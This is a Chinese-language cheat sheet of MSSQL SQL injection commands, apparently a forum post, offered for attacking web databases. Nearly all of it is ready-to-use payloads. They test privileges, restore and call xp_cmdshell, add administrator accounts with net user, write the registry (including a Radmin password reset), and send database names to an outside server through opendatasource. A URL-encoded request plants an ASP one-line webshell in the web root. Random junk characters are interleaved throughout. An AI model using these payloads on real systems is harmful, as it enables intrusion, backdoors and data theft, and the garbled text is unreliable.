阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
//看看是什么权限的
; l& C1 A8 v% Z6 {  w! Kand 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
; {) o/ M* H8 R' R
9 {& z- f0 I$ g4 H9 q" l% k//检测是否有读取某数据库的权限
  s6 l/ r, x9 @# F( @9 J- uand 1= (Select HAS_DBACCESS('master'))
- W6 P* F( g4 y$ c# m$ \' MAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
* H9 a( s# Y) _3 c- a% X

数字类型
. ?# u% ^+ J3 {1 b" E+ u7 r; k. X# Mand char(124)%2Buser%2Bchar(124)=0

8 M; ], h! H/ R3 V  F字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
; w: O$ T) V% e, F' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
and user>0
/ j8 O# X2 L8 |  s9 X" A, t' and user>0 and ''='
7 t; t) Y4 H. L0 g' y
6 Y# I0 n  b" J0 p检测是否为SA权限
9 Z5 P( y4 d6 E1 C8 Rand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
& E% c% i! Y: O) b' c" w# [And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是不是MSSQL数据库
  I' B+ n* V$ p. z' Rand exists (select * from sysobjects);--

检测是否支持多行
7 |( M6 ~. ]( o! F;declare @d int;--
0 |3 A3 A$ A5 G6 C& k
2 N8 Z, J* f- P. ^恢复 xp_cmdshell
* Y6 Z" m& C5 l" H;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
- I7 G3 m' Z: d* ^  o$ C% H

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
3 v! G% U- T6 @. F* w9 e6 j: h2 L
//-----------------------
//      执行命令
1 R* z1 W3 N# x* V+ l- }  ?9 {& V//-----------------------
: Y" i1 h2 [+ N+ ?, O. y首先开启沙盘模式：
( j; x  y1 s: kexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

& O/ |1 ?7 V, x& u, ^然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
( F5 r7 r7 Y, z& T+ ~
4 I" P' k3 C4 T" P$ e2 X! `执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
/ {$ ~  m7 L, {$ ^# u
判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

* B# `7 h( ]3 G! d! p, Q9 r写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

& u+ s9 C* h, K" x$ dREG_SZ

读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

读取目录内容
/ W7 N" }+ `4 V4 s, l) Qexec master..xp_dirtree 'c:\winnt\system32\',1,1


$ _' J% n+ }( ~5 V1 \, E数据库备份
1 ?8 s$ _0 g' J$ T4 |9 J8 `1 Q$ Nbackup database pubs to disk = 'c:\123.bak'

" s' q( q: g/ [( b0 a//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--



. Z  s1 K% }8 A# j2 D- U更改sa口令方法：用sql综合利用工具连接后，执行命令：
2 w( ?8 X' t% A0 K$ Qexec sp_password NULL,'新密码','sa'
1 m2 w. U' k: p, B7 x0 m
$ }# p) ], n) D! p: k% X, c) ~添加和删除一个SA权限的用户test：
( H+ e8 ~4 N* m) V- C( ~exec master.dbo.sp_addlogin test,ptlove
; g3 @2 X* w: P( T$ i# \exec master.dbo.sp_addsrvrolemember test,sysadmin
9 h2 K$ m0 y7 g7 _0 R: J8 p
- w; I2 U4 B: o3 E删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
+ G/ ~& y( E; t4 H% U
添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
8 S/ [+ |* ]( x  I) H3 H7 |GRANT exec On xp_proxiedadata TO public
+ Y9 ^7 X4 X7 P+ x$ ~5 r
0 T3 F: [6 R9 {# t* {
' H2 C, e& v; b停掉或激活某个服务。

* ]2 A4 f' |7 L! k. Rexec master..xp_servicecontrol 'stop','schedule'
3 r6 |( Y% U: Y' H; `exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
6 ^* v: L- u+ R" p, E9 }  B
dbo.xp_makecab

. h" X( D: a0 }: G/ O- W, r将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
+ A& P4 z) a; I3 Z9 x0 o'c:\test.cab','mszip',1,
% w; i. e9 ]' L, t( {: G1 a'C:\Inetpub\wwwroot\SQLInject\login.asp',
6 ]" l. h  ?/ G$ ~/ k'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

3 @' i% m* ~5 h2 `xp_terminate_process

停掉某个执行中的程序，但赋予的参数是 Process ID。
2 Z8 p6 b! j8 ^% \$ v( y利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
8 C, E5 W( c" B2 T# p- F( T+ T
xp_terminate_process 2484
5 O; f8 Q: x, o" `: _2 j
xp_unpackcab

解开压缩档。
$ h. o; V) z/ o% e2 @9 D8 _
xp_unpackcab 'c:\test.cab','c:\temp',1
4 U" v3 f( _  p% r. h! e
" u: g$ O1 z; z) e# _
某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

1 S! k3 K8 F9 u: U+ G+ i" Bcreate database lcx;
6 P! t) q7 r% [( ]/ e& O' FCreate TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
9 N; u: U8 a4 m1 ]" D( _2 t) r( X
# ~. q- B+ P8 q+ M//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

( V" v5 z( U4 A2 r" B' i
+ A# S# |* o0 Q* w$ _/ N/ I  @//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
: g0 `# s$ V8 E+ o8 P4 Z6 f# A
用 sp_makewebtask直接在web目录里写入一句话马：
7 I3 I# C: U6 d2 w9 m; Thttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
$ L( ^3 J9 Y+ g8 d4 M# e5 j( J, [
//更新表内容
& |6 X+ ^- L/ x, @1 FUpdate films SET kind = 'Dramatic' Where id = 123

//删除内容
/ s) `" J' |. d, @delete from table_name where Stockid = 3